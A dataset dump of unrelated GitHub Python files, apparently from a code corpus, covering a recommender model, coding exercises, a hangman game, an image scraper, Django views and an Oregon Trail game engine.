set()\r\n self.λ_ = {}\r\n self.λ = {}\r\n for u, i, rui in self.train:\r\n if u not in self.y:\r\n self.y[u] = [round(random.uniform(6, 10),3) for k in range(self.F)]\r\n \r\n if i not in self.e1 :\r\n self.e1[i] = [round(random.uniform(6,10),3) for k in range(self.F)]\r\n self.e2[i] = [round(random.uniform(0.1,2),3) for k in range(self.F)]\r\n \r\n self.λ_.setdefault(u, {}) \r\n self.λ_[u].setdefault(i, [0 for k in range(self.F)])\r\n self.λ.setdefault(u, {})\r\n self.λ[u].setdefault(i, [0 for k in range(self.F)])\r\n self.U.add(u)\r\n self.I.add(i)\r\n \r\n print('initialization has already been completed')\r\n \r\n def DelLFM(self):\r\n del self.a\r\n del self.b1\r\n del self.b2\r\n del self.e1\r\n del self.e2\r\n del self.I\r\n del self.U\r\n del self.y\r\n del self.λ\r\n del self.λ_\r\n print('released the memories')\r\n \r\n def initToVar(self):\r\n '''初始化y的所有值为var'''\r\n for key in self.y:\r\n for k in range(self.F):\r\n self.y[key][k] = self.a\r\n \r\n for key in self.e1:\r\n for k in range(self.F):\r\n self.e1[key][k] = self.b1\r\n \r\n for key in self.e2:\r\n for k in range(self.F):\r\n self.e2[key][k] = self.b2\r\n \r\n \r\n def RecordModel(self):\r\n path = 'BPL2222222'\r\n import os\r\n \r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n q_file = 'q.txt'\r\n p_file = 'p.txt'\r\n test_file = 'test.txt'\r\n q_path = path + '/' + q_file\r\n p_path = path + '/' + p_file\r\n test_path = path + '/' + test_file\r\n print(q_path)\r\n \r\n \r\n file = open(q_path, 'w')\r\n file.write(str(self.q))\r\n file.close()\r\n \r\n file = open(p_path, 'w')\r\n file.write(str(self.p))\r\n file.close()\r\n \r\n file = open(test_path, 'w')\r\n file.write(str(self.test))\r\n file.close()\r\n \r\n print('Recording the model is successful!')\r\n \r\n \r\n def ReadModel(self):\r\n path = 'BPL2222222'\r\n q_file = 'q.txt'\r\n p_file = 'p.txt'\r\n test_file = 'test.txt'\r\n \r\n q_path = path + '/' + q_file\r\n p_path = path + '/' + p_file\r\n test_path = path + '/' + test_file\r\n \r\n \r\n \r\n file = open(q_path, 'r')\r\n qstr = file.read()\r\n self.q = eval(qstr)\r\n file.close()\r\n \r\n file = open(p_path, 'r')\r\n pstr = file.read()\r\n self.p = eval(pstr)\r\n file.close()\r\n \r\n file = open(test_path, 'r')\r\n pstr = file.read()\r\n self.test = eval(pstr)\r\n file.close()\r\n \r\n print('Reading the model is successful!')\r\n \r\n \r\n \r\n \r\n def InitLFM(self):\r\n 'initialize p,q:p is the dictionary of users-factors;q is the dictionary of items-factors'\r\n self.p = dict()\r\n self.q = dict()\r\n for u, i, rui in self.train:\r\n if u not in self.p:\r\n self.p[u] = [round(random.uniform(0,1),3) for x in range(self.F)]\r\n if i not in self.q :\r\n self.q[i] = [round(random.uniform(0,1),3) for x in range(self.F)]\r\n \r\n # print('Initialization of p and q was done!')\r\n\r\n def fit(self):\r\n 'learn the latent factor model return p,q'\r\n No = 1\r\n for step in range(self.n):\r\n \r\n for u, i, r in self.train:\r\n λ_sum = 0\r\n rating = float(r)\r\n\r\n y_sum = sum(self.y[u])\r\n for k in range(self.F):\r\n # print('Y:', y[u][k] / y_sum)\r\n # print('e1:',e1[i][k]**rating)\r\n # print('e2:', e2[i][k]**(5 - rating))\r\n self.λ_[u][i][k] = self.y[u][k]* (self.e1[i][k]**rating) *(self.e2[i][k]**(5 - rating))\\\r\n /(self.e1[i][k] + self.e2[i][k])**5\r\n # print(λ_[u][i][k])\r\n # λ_[u][i][k] = math.exp(exponent)\r\n \r\n λ_sum += self.λ_[u][i][k]\r\n for k in range(self.F):\r\n self.λ[u][i][k] = self.λ_[u][i][k]/λ_sum\r\n \r\n # if No % 80 == 1:\r\n # length = 0\r\n # for i in 
λ[u]:\r\n # if length > 3:\r\n # break\r\n # else:\r\n # length += 1\r\n # for k in range(F):\r\n # print('λ[%s][%s][%d]='%(u,i,k),end= '')\r\n # print(λ[u][i][k],'=',end = '')\r\n # print(y[u][k],'*pow(',e1[i][k],',',rating,')*pow(',e2[i][k],',',5 - rating,')',end='')\r\n # print('÷',round(y_sum,3),'÷pow(',round(e1[i][k] + e2[i][k],3),',5)')\r\n # print('\\n') \r\n \r\n # reset y, e1, e2 to their base values \r\n self.initToVar()\r\n for u, i, r in self.train:\r\n \r\n rating = float(r)\r\n \r\n for k in range(self.F):\r\n self.y[u][k] += self.λ[u][i][k]\r\n \r\n self.e1[i][k] += self.λ[u][i][k] * rating * 1.1\r\n self.e2[i][k] += self.λ[u][i][k] * (5 - rating)\r\n self.p = {}\r\n self.q = {}\r\n \r\n for u in self.U:\r\n y_sum = sum(self.y[u])\r\n self.p[u] = [0 for i in range(self.F)]\r\n for k in range(self.F):\r\n self.p[u][k] = self.y[u][k]/y_sum\r\n \r\n for i in self.I:\r\n self.q[i] = [0 for i in range(self.F)]\r\n for k in range(self.F):\r\n self.q[i][k] = self.e1[i][k]/(self.e1[i][k] + self.e2[i][k])\r\n # print('y', y[u])\r\n # print(e1[i])\r\n # print(e2[i])\r\n # print('p', p[u])\r\n # print('q', q[i]) \r\n# print(No, ':%.8f|%.8f'%(self.MAE('test'), self.MAE('train')))\r\n yield (step, self.MAE('train'))\r\n # print('%.6f'%MAEAll(p, q))\r\n yield 'finish!!!'\r\n self.DelLFM()\r\n \r\n def Predict(self, u, i):\r\n 'Calculate the predicted rating of user u for item i'\r\n Sum = 0\r\n# print(self.p[u] ,self.q[i])\r\n for f in range(self.F):\r\n Sum += self.p[u][f] * self.q[i][f]\r\n return Sum * 5\r\n \r\n def RMSE(self):\r\n 'Score prediction Method of RMSE'\r\n Sum = 0\r\n Variance = 0\r\n for u, i,rui in self.test:\r\n if u in self.p and i in self.q:\r\n pr = self.Predict(u, i)\r\n Variance = float(rui) - float(pr)\r\n # if Variance > 5 or Variance < -5:\r\n # print('rui=',rui,' pr=',pr)\r\n # print('Variance =',Variance)\r\n Sum += Variance * Variance\r\n # print(Sum)\r\n # print(len(test))\r\n return math.sqrt(Sum/len(self.test))\r\n \r\n def MAE(self, style='test'):\r\n 'Score prediction Method of MAE'\r\n Sum = 0\r\n count = 0\r\n if style == 'test':\r\n for u, i, rui in self.test:\r\n if u in self.p and i in self.q:\r\n Sum += math.fabs(float(rui) - self.Predict(u, i))\r\n count += 1\r\n# print((rui) ,':',self.Predict(u, i))\r\n return Sum/count\r\n else:\r\n for u, i, rui in self.train:\r\n if u in self.p and i in self.q:\r\n Sum += math.fabs(float(rui) - self.Predict(u, i))\r\n count += 1\r\n # print(math.fabs(float(rui) - self.Predict(u, i)))\r\n return Sum/count\r\n \r\n def setEvalPara(self,N = 10):\r\n 'Set the recommendation list length, usually top 10'\r\n self.N = N+1\r\n self.item_test_all = set()\r\n self.user_test_all = set()\r\n for u, i, r in self.test:\r\n self.item_test_all.add(i)\r\n self.user_test_all.add(u)\r\n print('Evaluation parameters are set!')\r\n \r\n \r\n def setN(self,N):\r\n self.N = N+1\r\n\r\n\r\n def TopN(self, user, choice = 'WITH_RATING'):\r\n \r\n user_item = []\r\n if choice == 'WITH_RATING':\r\n for i in self.item_test_all:\r\n if i in self.q:\r\n \r\n r = self.Predict(user, i)\r\n user_item.append((i,r))\r\n return set([elem[0] for elem in (sorted(user_item, key=lambda item:item[1])[:self.N])])\r\n else:\r\n for i in self.item_test_all:\r\n if i in self.q:\r\n \r\n r = self.Predict(user, i)\r\n user_item.append((i,r))\r\n return sorted(user_item,key = lambda item:item[1])[:self.N]\r\n \r\n \r\n def setTestUI(self):\r\n 'Collect the user and item sets from the test set'\r\n self.item_test_all = set()\r\n self.user_test_all = set()\r\n for u, i, r in self.test:\r\n self.item_test_all.add(i)\r\n self.user_test_all.add(u)\r\n \r\n \r\n def Coverage(self):\r\n 
item_len = set()\r\n for u in self.user_test_all:\r\n item_list = self.TopN(u)\r\n for item in item_list:\r\n item_len.add(item[0])\r\n print('Coverage', len(item_len)/len(self.item_test_all))\r\n\r\n def Precision(self):\r\n user_list = {}\r\n for u, i, r in self.test:\r\n if u not in user_list:\r\n user_list[u] = []\r\n user_list[u].append((i, r))\r\n else:\r\n for index, item in enumerate(user_list[u]):\r\n if item[1] < r:\r\n user_list[u].insert(index, (i, r))\r\n if(len(user_list[u]) > self.N-1):\r\n user_list[u].pop(len(user_list[u])-1)\r\n break \r\n for u in self.user_test_all:\r\n hit = 0\r\n n_precision = 0\r\n rec_list = self.TopN(u)\r\n# print([elem[0] for elem in user_list[u]])\r\n rec_set = set(elem[0] for elem in rec_list)\r\n user_set = set([elem[0] for elem in user_list[u]])\r\n# if not len(user_set) < self.N:\r\n \r\n hit += len(user_set&rec_set)\r\n n_precision += self.N\r\n print('hit:', hit)\r\n print('Precision', hit/n_precision)\r\n\r\n \r\n def getItem_dict(self):\r\n self.item_dict = {}\r\n for u, i, r in self.test:\r\n if i not in self.item_dict:\r\n self.item_dict[i] = set()\r\n self.item_dict[i].add(u)\r\n \r\n \r\n def similarity(self, item_1, item_2):\r\n length_12 = len(self.item_dict[item_1] & self.item_dict[item_2])\r\n if length_12 == 0:\r\n return 0\r\n else:\r\n return length_12/math.sqrt(len(self.item_dict[item_1]) * len(self.item_dict[item_2]))\r\n \r\n \r\n def Diversity(self):\r\n self.getItem_dict()\r\n rec_set = set()\r\n pop_set = set()\r\n sim_dict = {}\r\n diver_all = 0 # total diversity across all users\r\n \r\n for u in self.user_test_all:\r\n rec_set = self.TopN(u)\r\n diversity = 0 # diversity of this user's recommendation list\r\n for i1 in rec_set:\r\n pop_set.add(i1) # items already visited go into pop_set\r\n for i2 in rec_set - pop_set: # the inner loop only runs over items not visited yet\r\n if i1 < i2:\r\n tpl = (i1, i2)\r\n else:\r\n tpl = (i2, i1)\r\n if tpl not in sim_dict:\r\n sim_dict[tpl] = self.similarity(i1, i2)\r\n diversity += sim_dict[tpl]\r\n u_list = len(rec_set)\r\n diver_all += 1 - diversity * 2 / (u_list * (u_list - 1)) # average over the C(n,2) item pairs\r\n diver_all /= len(self.user_test_all)\r\n print('Diversity:', diver_all)\r\n","repo_name":"darknli/recommend","sub_path":"prob_lfm.py","file_name":"prob_lfm.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8284840423","text":"# https://leetcode.com/problems/binary-tree-level-order-traversal/\n\n# Given the root of a binary tree, return the level order traversal of its nodes' values. 
(i.e., from left to right, level by level).\n\n# Example 1:\n# Input: root = [3,9,20,null,null,15,7]\n# Output: [[3],[9,20],[15,7]]\n\n# Example 2:\n# Input: root = [1]\n# Output: [[1]]\n\n# Example 3:\n\n# Input: root = []\n# Output: []\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass Solution:\n def levelOrder(self, root):\n result = []\n \n if root is None:\n return result\n\n queue = deque()\n queue.append(root)\n\n while queue:\n level_size = len(queue)\n current_level = list()\n for i in range(level_size):\n current_node = queue.popleft() # Same thing as popping the first element \n current_level.append(current_node.val)\n\n if current_node.left:\n queue.append(current_node.left)\n\n if current_node.right:\n queue.append(current_node.right)\n\n result.append(current_level)\n\n return result\n\n\n# Time complexity: O(n), where n is the total number of nodes\n# Space Complexity: O(n), where n is the total number of nodes","repo_name":"bolu-tife/Data-Structures-and-Algorithms","sub_path":"Tree Breadth First Search/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42807622637","text":"field_size = int(input())\n\nmatrix = []\nbunny_pos = []\nbest_path = []\n\nbest_direction = None\nmax_eggs_collected = 0\n\ndirections = {\n 'up': (-1, 0),\n 'down': (1, 0),\n 'left': (0, -1),\n 'right': (0, 1),\n}\n\nfor row in range(field_size):\n matrix.append(input().split())\n\n if 'B' in matrix[row]:\n bunny_pos = [row, matrix[row].index('B')]\n\nfor direction, pos in directions.items():\n row, col = [\n bunny_pos[0] + pos[0],\n bunny_pos[1] + pos[1]\n ]\n\n path = []\n eggs_collected = 0\n\n while 0 <= row < field_size and 0 <= col < field_size:\n if matrix[row][col] == 'X':\n break\n\n eggs_collected += int(matrix[row][col])\n path.append([row, col])\n\n row += pos[0]\n col += pos[1]\n\n if eggs_collected >= max_eggs_collected:\n max_eggs_collected = eggs_collected\n best_direction = direction\n best_path = path\n\nprint(best_direction)\nprint(*best_path, sep='\\n')\nprint(max_eggs_collected)\n","repo_name":"vncmd/SoftUni-Python-Advanced-OOP","sub_path":"[0] Python Advanced/[1.4] Multidimensional Lists/[2] Multidimensional Lists - Exercises 2/04_easter_bunny.py","file_name":"04_easter_bunny.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73924554027","text":"import random\nfrom hangmanArt import logo \nfrom hangmanArt import stages \nfrom hangmanWord import word_list\n\nendOfGame = False\nlives = 6\n\nprint(logo)\n\nchosenWord = random.choice(word_list) \n\nguessWordsList = []\n\nfor letter in chosenWord:\n guessWordsList.append('_') \n\nwhile not endOfGame:\n \n guess = input(\"Enter a letter to guess the word : \").lower()\n if guess in guessWordsList:\n print(\"You have already guessed this letter\")\n else:\n for index in range(len(chosenWord)):\n if chosenWord[index] == guess:\n guessWordsList[index] = guess\n \n if guess not in chosenWord:\n lives = lives-1\n if lives == 0:\n endOfGame = True\n print(\"you lose\")\n \n print(f\"{''.join(guessWordsList)}\")\n \n if '_' not in guessWordsList:\n endOfGame = True\n print(\"You Won\\n\") \n print(guessWordsList)\n\n 
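# 'stages' (imported from hangmanArt, not shown in this file) is assumed to map remaining lives to ASCII gallows art, so this redraws the gallows after every guess.\n 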
print(stages[lives])\n","repo_name":"ssrishi/pythonPoject","sub_path":"hangmanGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73607466667","text":"import os\r\nimport urllib.request\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n# Create the output folder for downloaded images\r\n\r\nkeyword = \"도서관\"\r\n\r\nif not os.path.exists(keyword):\r\n os.makedirs(keyword)\r\n\r\nquery = keyword\r\n\r\nurl = f\"https://www.google.com/search?q={query}&tbm=isch\"\r\ndriver = webdriver.Chrome()\r\ndriver.get(url)\r\n\r\nSCROLL_PAUSE_TIME = 1\r\n# Get scroll height\r\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\nnew_height = 0\r\n\r\nwhile True:\r\n # Scroll down to bottom\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n # Wait to load page\r\n sleep(SCROLL_PAUSE_TIME)\r\n # Calculate new scroll height and compare with last scroll height\r\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n if new_height == last_height:\r\n try:\r\n # Wait until the \"Show more results\" button appears\r\n more_button = WebDriverWait(driver, 10).until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, \".mye4qd\"))\r\n )\r\n more_button.click()\r\n sleep(2)\r\n except:\r\n break\r\n last_height = new_height\r\n\r\nimg_elements = driver.find_elements(By.CSS_SELECTOR,\".rg_i\")\r\n\r\nfor i, img in enumerate(img_elements):\r\n print(f\"{query} : {i+1}/{len(img_elements)} proceed...\")\r\n try:\r\n image_xpath = f'//*[@id=\"islrg\"]/div[1]/div[{i+1}]/a[1]/div[1]/img'\r\n\r\n image_element = WebDriverWait(driver, 3).until(\r\n EC.presence_of_element_located((By.XPATH, image_xpath))\r\n )\r\n image_element = driver.find_element(By.XPATH,image_xpath)\r\n image_url = str(image_element.get_attribute(\"src\"))\r\n urllib.request.urlretrieve(image_url, str(f\"{keyword}/library_han_{i}.jpg\"))\r\n sleep(1)\r\n print(f\"img {i} done\")\r\n except:\r\n print(f\"error {i}\")\r\n print(type(image_element))\r\n print(type(image_url))\r\n sleep(0.5)\r\n\r\n\r\n# Quit the web driver\r\ndriver.quit()\r\n","repo_name":"JeonSuHyeong/google_crawling","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15227902677","text":"# Toy Rabin-Karp search: letters a-d map to digits and each 4-character window of T is hashed modulo q=13 before an exact comparison.\r\nabc={\r\n 'a':1,\r\n 'b':2,\r\n 'c':3,\r\n 'd':4\r\n}\r\nq=13\r\nT='cabcadcadbacadcbacacad'\r\nP='baca'\r\nT1=''\r\nfor i in T:\r\n s=str(i)\r\n T1+=str(abc[s])\r\nP1=''\r\nfor x in P:\r\n P1+=x.replace(x,str(abc[x]))\r\ncomp1=int(P1)%q\r\ncounter=0\r\nfor z in range(len(T)-len(P)+1):\r\n comp2=T1[counter]+T1[counter+1]+T1[counter+2]+T1[counter+3]\r\n if int(comp2)%q==comp1:\r\n if P1==comp2:\r\n print(counter)\r\n else:\r\n pass\r\n counter+=1\r\n","repo_name":"vlad-lavrynovych/sortAlgorythms","sub_path":"search_rk_4.py","file_name":"search_rk_4.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23172820205","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Comentario\nfrom .forms import 
ActualizarComentario\n\n# Create your views here.\n\n@login_required(login_url='users:login')\ndef listarcomentarios(request):\n \"\"\"View listing the user's comments\"\"\"\n\n # Fetch the user's comments\n comentarios = Comentario.objects.filter(titular=request.user, estado='Publicado')\n pendientes = Comentario.objects.filter(fuente=request.user, estado='Creado')\n\n # \"Error\" message when there is nothing to show\n mensaje = None\n if (not comentarios) and (not pendientes):\n mensaje = \"Aun no tienes comentarios\"\n\n return render(request, 'comentarios.html', {\n 'comentarios':comentarios,\n 'pendientes': pendientes,\n 'mensaje': mensaje,\n })\n\n@login_required(login_url='users:login')\ndef calificar(request, comentario_id):\n \"\"\"View for rating the tutoring session\"\"\"\n\n # Fetch the comment\n comentario = Comentario.objects.get(id=comentario_id)\n\n if request.method == 'POST':\n\n # Pull the data from the submitted form\n form = ActualizarComentario(request.POST, instance=comentario)\n \n # Save the changes and update the rating\n if form.is_valid():\n form.save()\n comentario.estado = 'Publicado'\n comentario.save()\n comentario.actualizarCalificacion()\n \n return redirect('comentarios')\n else:\n # Create the form and render it\n ya_es_favorito = request.session.get('ya_es_favorito', False)\n form = ActualizarComentario(instance=comentario)\n return render(request, 'calificar.html', {\n 'form': form,\n 'comentario': comentario,\n 'ya_es_favorito': ya_es_favorito\n })\n","repo_name":"federicoGuerrerot/ppi_10","sub_path":"comentarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26088597286","text":"# Python OOP - user assignment modified for chaining methods\n\nclass Users:\n \"\"\"Create a model of a user\"\"\"\n\n def __init__(self, first_name, last_name, email, age):\n \"\"\"Initialize the attributes for the user\"\"\"\n self.first_name = first_name.title()\n self.last_name = last_name.title()\n self.email = email\n self.age = age\n self.is_rewards_member = False\n self.gold_card_points = 0\n\n def display_info(self):\n \"\"\"Display user info\"\"\"\n full_name = f\"{self.first_name} {self.last_name}\"\n print(f\"\\nUser information:\")\n print(f\"User: {full_name}\")\n print(f\"User email: {self.email}\")\n print(f\"User age: {self.age}\")\n if self.is_rewards_member == True:\n print(f\"{self.first_name} is a rewards member\")\n else:\n print(f\"{self.first_name} is not a rewards member\")\n if self.gold_card_points == 0:\n print(f\"{self.first_name} has no gold card points\\n\")\n else:\n print(f\"{self.first_name} has {self.gold_card_points} points\\n\")\n return self\n\n def enroll(self):\n \"\"\"Enroll user into rewards membership and add 200 points\"\"\"\n if self.is_rewards_member == False:\n print(f\"Welcome to Rewards, {self.first_name}!\")\n self.is_rewards_member = True\n self.gold_card_points += 200\n print(f\"{self.first_name} you now have {self.gold_card_points} points\")\n else:\n print(f\"{self.first_name} you are already a rewards member\\n\")\n return self\n\n def spend_points(self, amount):\n \"\"\"Redeem reward points if member has them\"\"\"\n if self.gold_card_points > amount:\n self.gold_card_points -= amount\n print(f\"{self.first_name} you have redeemed {amount} points\")\n else:\n print(f\"{self.first_name} you do not have enough points to redeem\")\n print(f\"you only have {self.gold_card_points} 
points\")\n return self\n\n# Create first user\nprint(\"\\nFIRST USER:\")\n\nuser_neal = Users('neal', 'dreessen', 'dreessen.edu@gmail.com', 53)\n# Used chaining methods\nuser_neal.display_info().enroll().display_info().spend_points(50).display_info().enroll().spend_points(400)\n\nprint(\"\\nSECOND USER:\")\n\nuser_jeni = Users('jeni', 'mccarthy', 'her@email.com', 50)\n# Used chaining methods\nuser_jeni.display_info().enroll().spend_points(80)\n\nprint(\"\\nTHIRD USER:\")\n\nuser_burt = Users('burt', 'reynolds', 'burt@bandit.com', 75)\n# Used chaining methods\nuser_burt.display_info().spend_points(40)\n\n","repo_name":"dreessen-n/coding-dojo_python","sub_path":"fundamentals/oop/users_chaining_methods.py","file_name":"users_chaining_methods.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15462575498","text":"# NOTE: NO SECURITY. You can add crap like a series name \"\" and have bad things happen.\n#\n\nfrom google.appengine.api import users\n\nfrom handlers import base\n\nclass Series(base.Base):\n def get(self, name):\n template_values = {\n 'user': users.get_current_user(),\n 'name' : name\n }\n self.render('series.html', template_values)\n","repo_name":"kberg/dviz","sub_path":"handlers/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37681138840","text":"\"\"\"\nThis module is the entry point for the game. It handles the high level\ngame logic and acts as a controller for all of modules.\n\"\"\"\n\nimport graphics\nimport game_io as io\nimport player\nimport random\nimport hunting\nimport misfortunes\nfrom time import sleep\n\nclass engine():\n \"\"\"\n Holds high level game state variables and lower level objects from modules.\n Runs the main game loop.\n \n Members:\n sleep (int): Amount of time to sleep between turns. 
Gives user time to read event messages.\n should_close (bool): Allows game to exit.\n did_win (bool): True if the player reached a win condition.\n did_quit (bool): True if the player ended the game early.\n \"\"\"\n def __init__(self):\n\n\n self.messages = io.messages()\n self.player = player.player()\n self.sleep = 2\n self.should_close = False\n self.did_win = False\n self.did_quit = False\n self.gui = graphics.gui(player)\n \n def run_tests(self, debug=False):\n \"\"\"\n Alternate way to run the engine to allow for debugging.\n \n Arguments:\n debug (bool) (optional): True will run the debug console input.\n \n Returns:\n None\n \"\"\"\n self.player.load_debug()\n while not self.should_close: \n self.player.inventory['food'] = 1000\n self.player.inventory['oxen'] = 10\n self.take_turn()\n \n # Run debug console input.\n if debug:\n debug_input = input(\"$ \")\n if debug_input == 'q':\n self.should_close = True\n if debug_input == '1':\n if misfortunes.randomize(self.player):\n self.should_close = True\n if debug_input == '2':\n self.player.update_inventory('kits',2)\n self.close()\n \n def new_game(self):\n \"\"\"\n Welcomes user and allows them to enter player/member names.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n self.messages.print_message('welcome')\n sleep(self.sleep)\n \n # Party leader.\n print('What is your name?')\n self.player.members.append(player.member(io.get_input_string(),is_leader=True))\n \n # Party members.\n counts = ['first','second','third','fourth']\n for i in range(4):\n print('Please enter the name of your {} party member.'.format(counts[i]))\n self.player.members.append(player.member(io.get_input_string()))\n \n def store(self, fort=False):\n \"\"\"\n Prints prices to player and allows them to make purchases.\n \n Arguments:\n fort (bool) (optional): True if the store is a fort store, otherwise its the start store.\n \n Returns:\n None\n \"\"\"\n # Handle different messages to be printed.\n if not fort:\n key = 'start_store'\n self.messages.print_message('store_welcome')\n elif fort:\n self.player.forts_visited += 1\n key ='fort_store'\n key += \"_{}\".format(self.player.forts_visited)\n message_count = self.messages.get_message_parsed_count(key)\n \n # Manually set order and attributes for buying items.\n keys = ['oxen','food','bullets','parts','kits']\n prices = [40,0.5,2,10,15]\n quants = [2,1,20,1,1]\n subtotal = 0.0\n \n # Change prices and quantities for fort stores.\n if fort:\n increase = self.player.forts_visited * 0.25 # Prices increase further along trail.\n prices[0] = round(prices[0] / 2 + increase * prices[0],2)\n for i in range(1,len(prices)):\n prices[i] += round(prices[i] * increase,2)\n quants = [1,1,20,1,1]\n\n # Handle special case for buying yokes.\n if not fort:\n while True:\n try:\n self.messages.print_message_parsed(key,0)\n response = io.get_input_int(low=0)\n amount = response * prices[0]\n if not(100 <= amount and amount <= 200):\n raise Exception()\n break \n except Exception:\n print(\"You tried to spend ${} on oxen.\".format(\"%.2f\" %amount))\n subtotal += amount\n self.player.update_inventory(keys[0],response*quants[0])\n self.player.consume('money', amount)\n print(\"Sub-total: ${}\".format(\"%.2f\" %subtotal))\n \n # Handle the rest of the store buying options.\n if not fort:\n start_range = range(1,message_count)\n elif fort:\n start_range = range(0,message_count)\n for i in start_range:\n self.messages.print_message_parsed(key,i)\n while True:\n try:\n response = io.get_input_int(low=0)\n quant = response * 
quants[i]\n amount = response * prices[i]\n if not self.player.can_consume('money',amount):\n raise AssertionError\n if not self.player.can_add_to_inventory(keys[i],quant):\n raise ValueError\n break\n except AssertionError:\n print(\"You don't enough money, please enter a new amount.\")\n except ValueError:\n pass\n subtotal += amount\n self.player.add_to_inventory(keys[i],response*quants[i])\n self.player.consume('money', amount) \n print(\"Sub-total: ${}\".format(\"%.2f\" %subtotal))\n print(\"Total: ${}\".format(\"%.2f\" %subtotal))\n \n def pick_start_date(self):\n \"\"\"\n Prompts user to proceed with standard start data or change to a custom date.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n print('Would you like to take off on {} (1) or on a different date (2)?'.format(self.player.current_date))\n options = [1,2]\n response = io.get_input_int_protected(options)\n if response == 1:\n return\n print(\"You can choose to start between March 1 and May 1\")\n \n # Get month.\n print('Please enter what month you would like to start. \\\n \\n \\t March (3) \\\n \\n \\t April (4) \\\n \\n \\t May (5) \\\n ')\n options = [3,4,5]\n response = io.get_input_int_protected(options)\n \n # Change dates allowed per game spec and real calendar days.\n days_allowed = 31\n if response == 4:\n days_allowed = 30\n if response == 5:\n days_allowed = 1\n \n # Get day.\n self.player.current_date = self.player.current_date.replace(month=response)\n print('Please enter what day you would like to start.')\n response = io.get_input_int(low = 1, high = days_allowed)\n self.player.current_date = self.player.current_date.replace(day=response)\n \n def take_turn(self):\n \"\"\"\n Main menu for game. Allows user to pick what to do, updates mileage,\n checks for end-game scenarios, and chance for raider attack.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n sleep(self.sleep)\n self.player.print_status()\n \n # Handle turn options.\n self.messages.print_message('turn_options')\n options = [1,2,3,4]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.rest()\n elif response == 2:\n self.travel()\n elif response == 3:\n self.hunt()\n elif response == 4:\n self.should_close = True\n self.did_quit = True\n return\n \n # Update mileage, check for end game and chance for raiders.\n self.player.update_miles_to_next()\n if self.player.check_for_end_game():\n self.should_close = True\n return\n if misfortunes.randomize(self.player):\n self.should_close = True\n return\n if self.player.check_for_end_game():\n self.should_close = True\n return\n misfortunes.raider_attack(self.player)\n \n def hunt(self):\n \"\"\"\n Calls hunting module to hunt and handles updating amount of food.\n Allows player to adjust rations.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n current_food = self.player.get_from_inventory('food')\n \n # Hunt.\n hunted_food = hunting.hunt(self.player)\n print(\"You returned with {} pounds of food\".format(hunted_food))\n \n # Adjust rations.\n self.messages.print_message('rations')\n options = [1,2,3]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.player.rations = 2\n elif response == 2:\n self.player.rations = 3\n elif response == 3:\n self.player.rations = 5\n \n # Consume food.\n food_consumed = self.player.members_alive * self.player.rations\n print(\"You consumed {} pounds of food\".format(food_consumed))\n current_food -= food_consumed\n \n # Handle adding food to inventory.\n if current_food + hunted_food > 1000:\n print(\"The 
wagon can only hold 1000 pounds of food\")\n left_food = hunted_food + current_food - 1000\n print(\"You left {} pounds of food behind\".format(left_food))\n self.player.update_inventory('food', 1000)\n else:\n total_food = current_food + hunted_food\n self.player.update_inventory('food',total_food)\n \n # Advance one day and fully heal members.\n self.player.advance_time(1)\n self.player.heal_all_to_full_if_sick()\n \n def travel(self):\n \"\"\"\n Travel random distance based on number of oxen.\n Handles encountered landmarks and win-condition.\n Adjusts food/mileage.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n random.seed()\n \n # Random mileage based on amount of oxen.\n lower = 70 + int(self.player.inventory['oxen']*5) # Lower bound ranges from 70-120.\n miles_to_travel = random.randint(lower,140)\n days_elapsed = 14\n food_consumed = self.player.members_alive * self.player.rations * days_elapsed\n\n # Travel and encounter landmark.\n if miles_to_travel >= self.player.miles_to_next_mark:\n location = self.player.get_next_location()\n original_miles = miles_to_travel\n miles_to_travel = self.player.miles_to_next_mark\n \n # Adjust food/days for arriving early.\n adjustment = float(miles_to_travel / original_miles)\n food_adjusted = int(food_consumed*adjustment)\n days_adjusted = int(days_elapsed*adjustment)\n \n # Update game-state with adjusted values.\n self.player.advance_time(days_adjusted)\n self.player.consume('food', food_adjusted)\n 